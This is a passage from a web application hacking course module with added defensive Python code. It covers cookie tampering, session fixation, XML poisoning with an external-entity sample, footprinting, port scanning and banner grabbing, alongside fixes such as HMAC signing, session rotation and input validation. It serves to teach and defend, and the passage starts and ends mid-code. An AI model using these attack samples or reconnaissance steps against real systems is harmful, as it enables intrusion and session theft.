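    if scheme == "base64":
        return base64.b64encode(value.encode()).decode()
    if scheme == "rot13":
        return codecs.encode(value, "rot_13")
    raise ValueError("unknown scheme")


def reveal_obfuscated(value: str, scheme: str) -> str:
    """No key is involved, so anyone who can read the cookie can undo either scheme."""
    if scheme == "base64":
        return base64.b64decode(value).decode()
    if scheme == "rot13":
        return codecs.decode(value, "rot_13")
    raise ValueError("unknown scheme")


def _serialize(cookie: dict) -> str:
    # Fixed field order so the same contents always produce the same tag.
    return ";".join(f"{k}={v}" for k, v in sorted(cookie.items()))


def sign_cookie(cookie: dict, secret: bytes = SERVER_SECRET) -> str:
    """Append an HMAC-SHA256 tag. The client can still read every field,
    but cannot change TotalPrice (or anything else) without invalidating the tag."""
    body = _serialize(cookie)
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body};sig={tag}"


def verify_cookie(raw: str, secret: bytes = SERVER_SECRET):
    """Return the cookie fields as a dict if the tag matches, otherwise None.
    A None result means the server must treat the cookie as untrusted input."""
    body, sep, tag = raw.rpartition(";sig=")
    if not sep:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return dict(item.split("=", 1) for item in body.split(";") if item)


def tamper(signed: str, field: str, new_value: str) -> str:
    """Model the attacker in the figure: rewrite one field but keep the old tag."""
    body, _, tag = signed.rpartition(";sig=")
    fields = dict(item.split("=", 1) for item in body.split(";") if item)
    fields[field] = new_value
    return f"{_serialize(fields)};sig={tag}"
```

Signing gives integrity, not confidentiality: the price and session ID remain readable by anyone who captures the cookie, so the signed value should still be sent only over HTTPS with the Secure attribute, and values that must stay private (or that the server already knows, like the basket total) are better kept server-side and referenced by the session ID alone.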

Session Fixation Attack

In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value. The attacker then assumes the identity of the victim and exploits his credentials at the server.

Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then lures the victim to use the same session ID. If the victim uses the session ID sent by the attacker, the attacker hijacks the user-validated session with the knowledge of the used session ID. The session fixation attack procedure is explained with the help of the following diagram:

FIGURE 13.26: How Cookie Poisoning Works

1. Attacker logs on to the bank website (server: juggybank.com) using his credentials.
2. Web server sets a session ID on the attacker's machine.
3. Attacker sends an email containing a link with a fixed session ID: http://juggybank.dom/login.jsp?sessionid=4321
4. User clicks on the link and is redirected to the bank website.
5. User logs in to the server using his credentials and the fixed session ID.
6. Attacker logs in to the server using the victim's credentials with the same session ID.

Insufficient Transport Layer Protection

Insufficient transport layer protection supports weak algorithms and uses expired or invalid certificates. An underprivileged SSL setup can also help the attacker to launch phishing and MITM attacks. This vulnerability exposes the user's data to untrusted third parties and can lead to account theft.

SSL/TLS should be used for authentication on websites; otherwise the attacker can monitor network traffic to steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Various threats like account theft, phishing attacks, and compromise of admin accounts may follow once systems have been compromised.
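The three weaknesses named above (weak algorithms, expired or invalid certificates, and a session cookie that travels in the clear) each map to a check a client or a deployment review can make. The following is an added example, not code from the module; it uses only the Python standard library's ssl module. The cipher deny-list and the sample certificate dates are chosen for the example:

```python
import ssl
import time

# Cipher-suite name fragments that indicate a weak or broken algorithm
# (deny-list chosen for this example).
WEAK_CIPHER_MARKERS = ("RC4", "DES", "NULL", "EXPORT", "MD5", "ANON")


def make_strict_client_context() -> ssl.SSLContext:
    """Verify the server certificate against the trust store, check the
    hostname, and refuse protocol versions below TLS 1.2."""
    ctx = ssl.create_default_context()   # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_report(ctx: ssl.SSLContext) -> dict:
    """Summarise the settings that matter, so a deployment can assert on them."""
    return {
        "check_hostname": ctx.check_hostname,
        "verify_required": ctx.verify_mode == ssl.CERT_REQUIRED,
        "minimum_version": ctx.minimum_version.name,
    }


def is_certificate_expired(not_after: str, now: float = None) -> bool:
    """not_after is the 'notAfter' string from SSLSocket.getpeercert(),
    e.g. 'Jan  1 00:00:00 2020 GMT'."""
    if now is None:
        now = time.time()
    return ssl.cert_time_to_seconds(not_after) < now


def weak_ciphers(cipher_names) -> list:
    """Names from an offered cipher list that rely on a weak algorithm."""
    return [c for c in cipher_names
            if any(m in c.upper() for m in WEAK_CIPHER_MARKERS)]


def cookie_is_secure(set_cookie_header: str) -> bool:
    """Without the Secure attribute the browser also sends the cookie over
    plain HTTP, which is what lets a sniffer capture the session."""
    attrs = [p.strip().lower() for p in set_cookie_header.split(";")[1:]]
    return "secure" in attrs
```

The certificate and cipher checks operate on values a client already receives during the handshake (getpeercert() and the negotiated or offered cipher names), so they can run as part of a monitoring job without any extra network access.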

Improper Error Handling

Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities.

Example error page from the slide (http://juggyboy.com/), showing the kind of detail a debug-mode error exposes:

General Error
Could not obtain post/user information
DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = 1547 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
Line: 435
File: /user/home/geeks/www/vonage/modules/forums/viewtopic.php

Improper error handling may result in various types of security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. An attacker can get various details such as the network version, etc. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks.

Improper error handling may allow an attacker to gather information such as:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment
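The error page above leaks the SQL text, a server file path and a line number to the browser. The following is an added example, not code from the module: a Python handler in the leaky debug-mode style beside one that logs the full exception server-side and returns only an opaque reference ID, plus a small check a reviewer can run over response bodies. The database failure is constructed to mimic the slide's message:

```python
import logging
import traceback
import uuid

log = logging.getLogger("app.errors")


class DatabaseError(Exception):
    """Stand-in for a DB driver exception; the message mimics the slide's leak."""


def run_query():
    # Constructed failure modelled on the slide's DEBUG MODE output.
    raise DatabaseError(
        "1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145) "
        "SELECT u.username, p.* FROM nuke_bbposts p, nuke_users u WHERE p.topic_id = 1547"
    )


def handle_request_debug_mode() -> dict:
    """The vulnerable pattern: whatever the exception says goes to the client."""
    try:
        run_query()
    except Exception as exc:
        return {"status": 500,
                "body": f"General Error\n{exc}\n{traceback.format_exc()}"}
    return {"status": 200, "body": "ok"}


def handle_request_safe() -> dict:
    """The corrected pattern: full detail to the log, opaque reference to the client."""
    try:
        run_query()
    except Exception:
        ref = uuid.uuid4().hex
        # Stack trace, SQL text and file paths stay server-side, keyed by ref,
        # so support staff can still find the cause from the reference number.
        log.exception("request failed, ref=%s", ref)
        return {"status": 500,
                "body": f"An internal error occurred. Reference: {ref}"}
    return {"status": 200, "body": "ok"}


def leaks_internals(body: str) -> bool:
    """Heuristic a reviewer can run over captured responses: does the body
    contain SQL, a source path, or a stack frame?"""
    markers = ("SELECT ", "errno", "Traceback", ".php", "File \"", "Line:")
    return any(m in body for m in markers)
```

The same shape applies to every item in the list above (out-of-memory, null pointer, database unavailable, and so on): the category of failure may be reported to the user in generic terms, but the diagnostic detail belongs in the log.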

Insecure Cryptographic Storage

Web applications use cryptographic algorithms to encrypt their data and other sensitive information that is transferred from server to client or vice versa, and cryptographic code to encrypt the data they store. Insecure cryptographic storage refers to the state of an application in which poorly written encryption code is used to encrypt and store sensitive data in the database. Such insecurely stored data can easily be read and modified by an attacker to gain confidential and sensitive information such as credit card information, passwords, SSNs, and other authentication credentials that were stored without appropriate encryption or hashing, and to launch identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper algorithms to encrypt sensitive data. The following pictorial representation shows vulnerable code that is poorly encrypted beside secure code that is properly encrypted using a secure cryptographic algorithm.

FIGURE: Insecure Cryptographic Storage
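The figure contrasts poorly encrypted storage with a proper algorithm. The following is an added example, not the module's figure or code, for the password case: a reversible "encryption" (ROT13, which the cookie section above also mentions) and an unsalted fast hash on the vulnerable side, and salted PBKDF2-HMAC-SHA256 with a per-user random salt and constant-time verification on the secure side. The iteration count is an assumed policy value:

```python
import codecs
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # assumed policy value; raise as hardware improves


def store_password_insecure(password: str) -> str:
    """Reversible 'encryption': anyone who reads the database recovers the password."""
    return codecs.encode(password, "rot_13")


def recover_from_insecure(stored: str) -> str:
    return codecs.decode(stored, "rot_13")


def store_password_unsalted_md5(password: str) -> str:
    """Fast, unsalted hash: identical passwords produce identical digests,
    and precomputed tables apply to every user at once."""
    return hashlib.md5(password.encode()).hexdigest()


def store_password_secure(password: str, salt: bytes = None) -> str:
    """Salted, slow, one-way: the stored string carries algorithm, iteration
    count and salt so it can be verified (and migrated) later."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password_secure(password: str, stored: str) -> bool:
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
```

Passwords are hashed because the application never needs the original value back. Data the application must read again, such as the credit card numbers the text mentions, cannot be hashed and instead needs authenticated encryption under a key that is stored separately from the database.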

Broken Authentication and Session Management

An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

Session ID in URLs: the attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes. Example URL from the slide (beginning not legible): ...le/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico

Password Exploitation: the attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.

Timeout Exploitation: if an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.

Authentication and session management includes every aspect of user authentication and managing active sessions. Yet at times solid authentication also fails due to weak credential functions like password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken with user authentication. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics.

Timeout Exploitation

If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.

Password Exploitation

An attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.
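Two of the session-management controls this section calls for can be shown in one place: rotating the session ID at login, which defeats the fixed ID 4321 from the session fixation diagram earlier, and expiring idle sessions, which limits the timeout exploitation described here. The following is an added example, not code from the module, of a minimal server-side session store; the idle timeout value is an assumed policy:

```python
import secrets

IDLE_TIMEOUT_SECONDS = 15 * 60   # assumed policy value


class SessionStore:
    """Server-side session table. Session IDs are always generated here;
    an ID presented by the client is only ever looked up, never created."""

    def __init__(self, idle_timeout: int = IDLE_TIMEOUT_SECONDS):
        self.idle_timeout = idle_timeout
        self._sessions = {}   # session_id -> {"user": str or None, "last_seen": float}

    def new_session(self, now: float) -> str:
        """Anonymous (pre-login) session with a random, unguessable ID."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def login(self, presented_sid: str, username: str, now: float) -> str:
        """Authenticate and ROTATE the session ID. Whatever ID the client
        presented (including one planted in a link) is discarded, so a party
        who knows the old ID gains nothing from the victim's login."""
        self._sessions.pop(presented_sid, None)
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username, "last_seen": now}
        return sid

    def resolve(self, sid: str, now: float):
        """Return the logged-in user for sid, or None if it is unknown or idle too long."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > self.idle_timeout:
            del self._sessions[sid]   # expire rather than revive a stale session
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def fixation_scenario(store: SessionStore, now: float) -> dict:
    """Replay the diagram: a fixed ID '4321' is presented at the victim's login."""
    planted = "4321"
    victim_sid = store.login(planted, "victim", now)
    return {
        "planted_id_resolves": store.resolve(planted, now),     # None
        "victim_session_user": store.resolve(victim_sid, now),   # "victim"
        "id_rotated": victim_sid != planted,                     # True
    }
```

Accepting only IDs that exist in the server-side table also closes the "session ID in URLs" case in a limited way: a copied URL still carries a valid ID until it times out or the user logs out, so IDs should travel in a cookie rather than in the URL in the first place.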

Unvalidated Redirects and Forwards

Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass.

An attacker links to an unvalidated redirect and lures the victim to click on it. When the victim clicks on the link, thinking that it is a valid site, it redirects the victim to another site. Such redirects lead to installation of malware and may even trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass, leading to:
- Session Fixation Attacks
- Security Management Exploits
- Failure to Restrict URL Access
- Malicious File Execution

FIGURE: Unvalidated Redirects and Forwards

Unvalidated Redirect: the attacker sends an email containing a rewritten link pointing at a malicious server; the user clicks it and is redirected to the attacker's server. (The example link is not legible in the figure.)

Unvalidated Forward: the attacker requests a page from the server with a forward parameter, http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp, and is forwarded to the admin page (Administration Page: Create price list, Create item listing, Purchase records, Registered users).
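The two parameters the figure abuses, a post-login redirect target and the fwd forward parameter, are both safe to accept only after validation against what the application itself serves. The following is an added example, not code from the module; the host name www.juggyshop.com and the page name purchase.jsp come from the figure, while the allow-list of forwardable pages is assumed:

```python
from urllib.parse import urlparse

SITE_HOST = "www.juggyshop.com"
# Pages a forward may target; admin.jsp is deliberately absent.
FORWARD_ALLOWLIST = {"purchase.jsp", "cart.jsp", "orderstatus.jsp"}   # assumed


def safe_redirect_target(requested: str, default: str = "/") -> str:
    """Return a same-site path to redirect to, or the default.
    Absolute URLs are allowed only if they point at this site; scheme-relative
    forms (//host), other schemes, and CR/LF or backslash tricks are rejected."""
    if not requested:
        return default
    if any(ch in requested for ch in "\\\r\n") or requested.startswith("//"):
        return default
    parsed = urlparse(requested)
    if parsed.scheme or parsed.netloc:
        if parsed.scheme not in ("http", "https") or parsed.netloc.lower() != SITE_HOST:
            return default
    path = parsed.path or "/"
    if not path.startswith("/"):
        return default
    # Re-emit only path and query; drop any fragment or userinfo the client sent.
    return path + (f"?{parsed.query}" if parsed.query else "")


def safe_forward(fwd_param: str, default: str = "purchase.jsp") -> str:
    """Server-side forward: only a bare page name on the allow-list, so
    ?fwd=admin.jsp (or ../anything) falls back to the default page."""
    name = (fwd_param or "").strip()
    return name if name in FORWARD_ALLOWLIST else default
```

Returning a path rather than the raw parameter means the application, not the client, decides the scheme and host of the final Location header; pairing that with an access check on the destination page (rather than on the page that performed the forward) is what actually closes the admin.jsp bypass.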

Web Services Architecture

FIGURE 13.29: Web Services Architecture (layers, top to bottom):
- WS Work Processes
- WS Security, WS Policy, WS Security Policy, WS-Federation, WS-Trust, WS-SecureConversation
- Security token profiles: SAML, Kerberos, X.509
- XML Encryption, XML Digital Signatures
- XML, SOAP, WSDL, Schema, WS-Advertising, etc.
- HTTP, .NET TCP Channel, Fast InfoSet, etc.

Web Services Attack

Web services evolution and its increasing use in business offers new attack vectors in an application framework. Web services are process-to-process communications that have special security issues and needs. Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services; these are vulnerable to various web application threats. Similar to the way a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser. These web services have detailed definitions that allow regular users and attackers to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is provided to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:
- An attacker injects a malicious script into a web service and is able to disclose and modify application data.
- An attacker is using a web service for ordering products, and injects a script to reset the quantity and status on the confirmation page to less than what was originally ordered. In this way, the system processing the order request submits the order, ships the order, and then modifies the order to show that a smaller number of products are being shipped. The attacker winds up receiving more of the product than he or she pays for.

Web Services Footprinting Attack

Attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.

Attackers use the Universal Business Registry (UBR) as a major source to gather information about web services. It is very useful for both businesses and individuals. It is a public registry that runs on UDDI specifications and SOAP, and is somewhat similar to a "whois server" in functionality. To register web services on a UDDI server, businesses or organizations usually use one of the following structures:
- Business Entity
- Business Service
- Binding Template
- Technical Model (tModel)
Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel.

FIGURE: Web Services Footprinting Attack

XML Query:

POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction:
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 229

<?xml version="1.0" encoding="utf-8"?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
  <Body>
    <find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2">
      <name>amazon</name>
    </find_business>
  </Body>
</Envelope>

XML Response:

HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Date: Tue, 28 Sep :07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version:
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1272

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos> ... one serviceInfo element per matching service, each with serviceKey and businessKey attributes and a <name xml:lang="en"> child (the key values and names are not legible in the figure) ... </serviceInfos></serviceList></soap:Body></soap:Envelope>

Web Services XML Poisoning

Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references, which can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.

XML Request:

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber></PhoneNumber>
</CustomerRecord>

Poisoned XML Request (the CustomerNumber and FirstName nodes are injected a second time):

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber></PhoneNumber>
</CustomerRecord>

XML poisoning is similar to a SQL injection attack, and it has a larger success rate in a web services framework. As web services are invoked using XML documents, the traffic that goes between server and browser applications can be poisoned. Attackers create malicious XML documents to alter parsing mechanisms like SAX and DOM that are used on the server. Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references, which can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.

FIGURE: Web Services XML Poisoning
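A service that validates the shape of an incoming CustomerRecord before its logic runs catches both problems this section describes: the duplicated nodes of the poisoned request, and any DTD in which entity declarations (external entity references, expansion bombs) could appear. The following is an added example, not code from the module, using only the standard library's xml.etree; the CustomerRecord payloads are reconstructed from the slide, with the email element name and the phone number value assumed since they are not legible there, and the size limit is an assumed policy value:

```python
import xml.etree.ElementTree as ET

EXPECTED_CHILDREN = ("CustomerNumber", "FirstName", "LastName",
                     "Address", "Email", "PhoneNumber")
MAX_BYTES = 4096   # assumed limit for this record type

# Reconstructed from the slide (element name "Email" and the phone value assumed).
CLEAN_REQUEST = b"""<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>555-0100</PhoneNumber>
</CustomerRecord>"""

# The slide's poisoned request: CustomerNumber and FirstName injected twice.
POISONED_REQUEST = b"""<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>555-0100</PhoneNumber>
</CustomerRecord>"""

# Constructed request carrying a DTD with an external entity declaration.
ENTITY_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE CustomerRecord [ <!ENTITY ext SYSTEM "file:///nonexistent-example"> ]>
<CustomerRecord><CustomerNumber>&ext;</CustomerNumber></CustomerRecord>"""


def validate_customer_record(data: bytes):
    """Return (ok, reason). ok is True only for a well-formed record with
    exactly one of each expected child element and nothing else."""
    if len(data) > MAX_BYTES:
        return False, "payload too large"
    # Refuse any DTD up front: that is where entity declarations would live,
    # whatever the parser's own expansion behaviour happens to be.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return False, "DTD not allowed"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    if root.tag != "CustomerRecord":
        return False, "unexpected root element"
    counts = {}
    for child in root:
        counts[child.tag] = counts.get(child.tag, 0) + 1
        if len(child):   # this record type has no nested elements
            return False, f"nested content in {child.tag}"
    for name in EXPECTED_CHILDREN:
        if counts.get(name, 0) != 1:
            return False, f"element {name} must appear exactly once"
    unknown = sorted(set(counts) - set(EXPECTED_CHILDREN))
    if unknown:
        return False, f"unknown elements: {unknown}"
    return True, "ok"
```

Cardinality and allow-list checks like these are what an XML Schema with minOccurs="1" maxOccurs="1" would enforce; doing them in code keeps the rule visible next to the handler and avoids depending on schema-validation features that differ between parsers.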

Module Flow

So far, we have discussed web application components and various threats associated with web applications. Now we will discuss web application hacking methodology. A hacking methodology is a way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it. The module flow moves on from Web App Concepts and Web App Threats to Hacking Methodology, followed by Web Application Hacking Tools, Countermeasures, Security Tools, and Web App Pen Testing. This section gives a detailed explanation of web application hacking methodology.

Web App Hacking Methodology

In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.

Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:

Server Discovery: discover the physical servers that host the web application. In server discovery, when there is an attempt to connect to a server, the redirector makes an incorrect assumption that the root of the URL namespace will be WebDAV-aware.

Service Discovery: discover the services running on web servers that can be exploited as attack paths for web app hacking. Service discovery searches a targeted application environment for loads and services automatically.

Server Identification: grab server banners to identify the make and version of the web server software. It consists of:
- Local Identity: this specifies the server Origin-Realm and Origin-Host.
- Local Addresses: these specify the local IP addresses of the server that are used for Diameter Capability Exchange messages (CER/CEA messages).
- Self-Names: this field specifies realms to be considered local to the server; it means that any request sent for these realms will be treated as if there is no realm in the specified request sent by the server.

Hidden Content Discovery: extract content and functionality that is not directly linked or reachable from the main visible content.

Footprint Web Infrastructure: Server Discovery

Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet. In order to footprint a web infrastructure, first you need to discover the active servers on the Internet. The three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup: Whois Lookup is a tool that allows you to gather information about a domain with the help of DNS and WHOIS queries, producing the result in the form of an HTML report. It is a utility that gives information about the IP address of the web server and DNS names. Some of the Whois Lookup tools are:
- http://www.tamos.com
- http://www.whois.net
- http://netcraft.com
- http://www.dnsstuff.com

DNS Interrogation: DNS interrogation queries the DNS, a distributed database that is used by various organizations to connect their IP addresses with the respective hostnames and vice versa. When the DNS is improperly configured, it is very easy to exploit it and gather the information required for launching an attack on the target organization. DNS interrogation provides information about the location and type of servers. Some of the tools are:
- http://www.dnsstuff.com
- http://network-tools.com
- http://e-dns.org
- http://www.domaintools.com

Port Scanning: port scanning is the process of scanning the system's ports to recognize the open doors. If an unused open port is recognized by an attacker, he or she can intrude into the system by exploiting it. This method attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. Some of the tools are:
- Nmap
- NetScan Tools Pro
- WhatsUp PortScanner Tool
- Hping

109 Footprint Web Infrastructure: Service Discovery

Footprint Web Infrastructure: Service Discovery

Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. Service discovery searches a targeted application environment for loads and services automatically. The targeted server has to be scanned thoroughly so that the common ports used by web servers for different services can be identified. The table that follows lists the common ports used by web servers and the respective HTTP services:

Port   Typical HTTP Services
80     World Wide Web standard port
81     Alternate WWW
88     Kerberos
443    SSL (https)
900    IBM WebSphere administration client
       Compaq Insight Manager

Module 13 Page 1831

110
2381   Compaq Insight Manager over SSL
4242   Microsoft Application Center remote management
7001   BEA WebLogic
7002   BEA WebLogic over SSL
7070   Sun Java Web Server over SSL
8000   Alternate web server, or web cache
8001   Alternate web server or management
8005   Apache Tomcat
9090   Sun Java Web Server admin module
       Netscape Administrator interface

TABLE: Service Discovery

You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser.

Source: http://nmap.org

Nmap is a scanner that is used to find information about systems and services on a network and to construct a map of the network. It can also determine the different services running on the web server and give detailed information about the remote computers.

FIGURE: Zenmap tool screenshot (scan of google.com listing 80/tcp open http, 113/tcp closed ident, 443/tcp open https)

Module 13 Page 1832

111 Footprint Web Infrastructure: Server Identification / Banner Grabbing

Analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications.

C:\> telnet www.juggyboy.com 80
HEAD / HTTP/1.0

Banner grabbing tools: 1. Telnet 2. Netcat 3. ID Serve 4. Netcraft

Footprint Web Infrastructure: Server Identification / Banner Grabbing

Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications.

C:\> telnet www.juggyboy.com 80
HEAD / HTTP/1.0

A banner can be grabbed with the help of tools such as Telnet, Netcat, ID Serve, and Netcraft. These tools make banner grabbing and analysis an easy task.

Module 13 Page 1833

112
HTTP/1.1 200 OK
Server:
Date: Thu, 07 Jul :08:16 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path=/
Via: 1.1 Application and Content Networking System Software
Connection: Close

Connection to host lost.
C:\>

(Annotation in the figure: Server identified as Microsoft IIS)

FIGURE: Server Identification / Banner Grabbing

Module 13 Page 1834
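The header analysis the module describes, as an added example that is not part of the EC-Council module: parse the response block returned by the HEAD request above and report what the Server and Via headers disclose, so that the same check can be run against one's own servers before an attacker does. The sample responses are constructed; the figure's Server value is not legible, so the Microsoft-IIS/6.0 banner shown in the fingerprinting report later in this module is used, and the date and cookie values are invented.

```python
import re

# Constructed sample response, modelled on the module's banner-grabbing figure.
# The Server value in the figure is not legible; Microsoft-IIS/6.0 is taken from the
# fingerprinting report later in the module. Date and cookie values are invented.
LEAKY_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Date: Thu, 07 Jul 2011 10:08:16 GMT\r\n"
    "Content-Length: 1270\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path=/\r\n"
    "Via: 1.1 Application and Content Networking System Software\r\n"
    "Connection: Close\r\n"
    "\r\n"
)

# Constructed response from a server whose banner and proxy headers have been minimised.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 07 Jul 2011 10:08:16 GMT\r\n"
    "Content-Length: 1270\r\n"
    "Content-Type: text/html\r\n"
    "Connection: Close\r\n"
    "\r\n"
)

# Product token optionally followed by "/version", e.g. "Microsoft-IIS/6.0" or "Apache".
PRODUCT_RE = re.compile(r"^([A-Za-z][\w.-]*?)(?:/(\d[\w.]*))?(?:\s|$)")

# Headers that routinely reveal infrastructure details behind the web server.
DISCLOSING_HEADERS = ("x-powered-by", "x-aspnet-version", "via")


def parse_headers(raw):
    """Split a raw HTTP response into (status line, {lower-cased name: [values]}).
    Repeated headers such as Set-Cookie keep every value."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
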